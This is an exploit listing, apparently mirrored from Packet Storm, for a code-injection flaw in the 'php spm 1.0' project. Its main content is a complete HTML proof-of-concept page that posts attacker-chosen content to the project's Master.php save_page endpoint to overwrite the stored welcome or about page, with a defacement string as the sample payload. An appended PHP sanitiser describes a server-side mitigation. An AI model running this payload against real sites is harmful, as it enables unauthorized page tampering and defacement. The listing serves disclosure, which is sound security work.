## https://sploitus.com/exploit?id=PACKETSTORM:181829
=============================================================================================================================================  
| # Title : php spm 1.0 WYSIWYG code injection vulnerability |  
| # Author : indoushka |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) |  
| # Vendor : https://www.kashipara.com/project/download/project2/user/2023/202305/kashipara.com_php-spms-zip.zip |  
=============================================================================================================================================  
  
PoC :  
  
[+] This payload injects code of your choice into the welcome or about page via TinyMCE, a WYSIWYG editor (version 7.3.0), whose content is processed by the file /php-spms/classes/Master.php .   
  
[+] Line 86 : set your target (the URL passed to xhr.open).  
  
[+] Line 27 : set your payload in the <textarea name="page[welcome]"> element; the key can be welcome or about.  
  
[+] Save the payload as poc.html.  
  
[+] Payload :   
  
<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Welcome Page Editor</title>
  <script src="https://cdn.tiny.cloud/1/dsrqgwhljvccmtuu414smiyefdarsp88j5fxk0uks60iek04/tinymce/7/tinymce.min.js" referrerpolicy="origin"></script>
</head>
<body>
  <main id="main" class="main">
    <div class="pagetitle">
      <h1>Welcome Page</h1>
      <nav>
        <ol class="breadcrumb">
          <li class="breadcrumb-item active">Welcome Page</li>
        </ol>
      </nav>
    </div>

    <div id="msg-container"></div>

    <div class="card rounded-0">
      <div class="card-body rounded-0 pt-4">
        <div class="container-fluid">
          <form id="page-form">
            <!-- The field name selects the stored page: page[welcome] or page[about] -->
            <textarea name="page[welcome]" cols="30" rows="10" class="form-control tinymce-editor" required>Hacked By indoushka ;</textarea>
          </form>
        </div>
      </div>
      <div class="card-footer">
        <div class="col-lg-4 col-md-5 col-sm-10 col-12 mx-auto">
          <button type="submit" class="btn btn-block w-100 btn-primary" form="page-form">Update</button>
        </div>
      </div>
    </div>

    <div id="loader" style="display:none;">Loading...</div>
    <div id="toast"></div>

    <script>
      // Initialize TinyMCE 7 on the textarea. The 'print' and 'paste' plugins and the
      // 'formatselect' toolbar item were removed or renamed in TinyMCE 6+, so they are
      // not listed here; plugins are given as one name per array entry.
      tinymce.init({
        selector: 'textarea.tinymce-editor',
        height: 300,
        menubar: false,
        plugins: [
          'advlist', 'autolink', 'lists', 'link', 'image', 'charmap', 'preview', 'anchor',
          'searchreplace', 'visualblocks', 'code', 'fullscreen',
          'insertdatetime', 'media', 'table', 'help', 'wordcount'
        ],
        toolbar: 'undo redo | blocks | bold italic backcolor | ' +
                 'alignleft aligncenter alignright alignjustify | ' +
                 'bullist numlist outdent indent | removeformat | help'
      });

      // Loader functions
      function start_loader() {
        document.getElementById('loader').style.display = 'block';
      }

      function end_loader() {
        document.getElementById('loader').style.display = 'none';
      }

      // Toast function: shows a message for three seconds
      function showMessage(message, type) {
        const messageDiv = document.getElementById('toast');
        messageDiv.innerHTML = `<div class="alert alert-${type}">${message}</div>`;
        setTimeout(() => {
          messageDiv.innerHTML = '';
        }, 3000);
      }

      // Form submit event listener
      document.getElementById('page-form').addEventListener('submit', function (e) {
        e.preventDefault(); // Prevent page reload

        // Start loader
        start_loader();

        const formData = new FormData(this); // Get form data (TinyMCE syncs the textarea on submit)
        const xhr = new XMLHttpRequest();    // Create new XMLHttpRequest object

        // Set up request: the target is the save_page action of Master.php
        xhr.open('POST', 'http://localhost/php-spms/classes/Master.php?f=save_page', true);

        // Handle response
        xhr.onreadystatechange = function () {
          if (xhr.readyState === XMLHttpRequest.DONE) {
            end_loader();
            if (xhr.status === 200) {
              const response = JSON.parse(xhr.responseText);
              if (response.status === 'success') {
                showMessage('Page updated successfully!', 'success');
                location.reload(); // Reload the page if successful
              } else if (response.status === 'failed' && response.msg) {
                showMessage(response.msg, 'error');
              } else {
                showMessage('An unknown error occurred.', 'error');
              }
            } else {
              showMessage('Error: ' + xhr.statusText, 'error');
            }
          }
        };

        // Send the request
        xhr.send(formData);
      });
    </script>
  </main>
</body>
</html>
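A server-side mitigation for the root cause, as an added example (hypothetical PHP, not the php-spms project's code): the save_page path of Master.php should allowlist-sanitise the submitted page[welcome] / page[about] HTML before storing it. The function and constant names are assumed, as is the assumption that the content arrives in $_POST['page'].

```php
<?php
// Hypothetical hardened save_page logic (added example, not php-spms code): allowlist-sanitise
// the editor output posted as page[welcome] / page[about] before it is stored and rendered.
const ALLOWED_PAGES = ['welcome', 'about'];
const ALLOWED_TAGS  = ['p', 'br', 'b', 'strong', 'i', 'em', 'u', 'ul', 'ol', 'li', 'h1', 'h2',
                       'h3', 'blockquote', 'a', 'img', 'table', 'thead', 'tbody', 'tr', 'td', 'th'];
const ALLOWED_ATTRS = ['a' => ['href', 'title'], 'img' => ['src', 'alt']];

function sanitize_html(string $html): string {
    $doc = new DOMDocument();
    libxml_use_internal_errors(true);   // editor output is tag soup; parse it quietly
    $doc->loadHTML('<!DOCTYPE html><html><head><meta charset="utf-8"></head><body>'
        . '<div id="root">' . $html . '</div></body></html>');
    libxml_clear_errors();
    $root = $doc->getElementById('root');
    sanitize_node($root);
    // Serialise only the wrapper's children, so the helper <div> is not stored
    return implode('', array_map(fn($c) => $doc->saveHTML($c), iterator_to_array($root->childNodes, false)));
}

function sanitize_node(DOMNode $node): void {
    // Snapshot the list: removing children from a live NodeList while iterating skips nodes.
    foreach (iterator_to_array($node->childNodes, false) as $child) {
        if ($child instanceof DOMElement) {
            $tag = strtolower($child->tagName);
            if (!in_array($tag, ALLOWED_TAGS, true)) { $node->removeChild($child); continue; }
            foreach (iterator_to_array($child->attributes, false) as $attr) {
                $name = strtolower($attr->name);
                $ok = in_array($name, ALLOWED_ATTRS[$tag] ?? [], true);
                if ($ok && ($name === 'href' || $name === 'src')) {   // reject javascript:, data:, ...
                    $ok = (bool) preg_match('#^(https?://|/|\#)#i', trim($attr->value));
                }
                if (!$ok) { $child->removeAttribute($attr->name); }   // drops on*, style, etc.
            }
            sanitize_node($child);   // recurse into the kept element
        } elseif (!($child instanceof DOMText)) {
            $node->removeChild($child);   // comments and processing instructions
        }
    }
}

function save_page(array $post): array {
    $clean = [];
    foreach ((array) ($post['page'] ?? []) as $key => $html) {
        if (!in_array($key, ALLOWED_PAGES, true) || !is_string($html)) {
            return ['status' => 'failed', 'msg' => 'Unknown page key.'];
        }
        $clean[$key] = sanitize_html($html);   // persist $clean, never the raw input
    }
    return ['status' => 'success', 'pages' => $clean];
}
```

With this in place the PoC's posted content survives only as text and any script or event-handler markup is dropped before storage; for production a maintained library such as HTML Purifier is the safer choice, but the allowlist must be enforced at the save endpoint either way, since TinyMCE's client-side configuration is fully under the submitting user's control.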
  
Greetings to :=====================================================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|  
===================================================================================================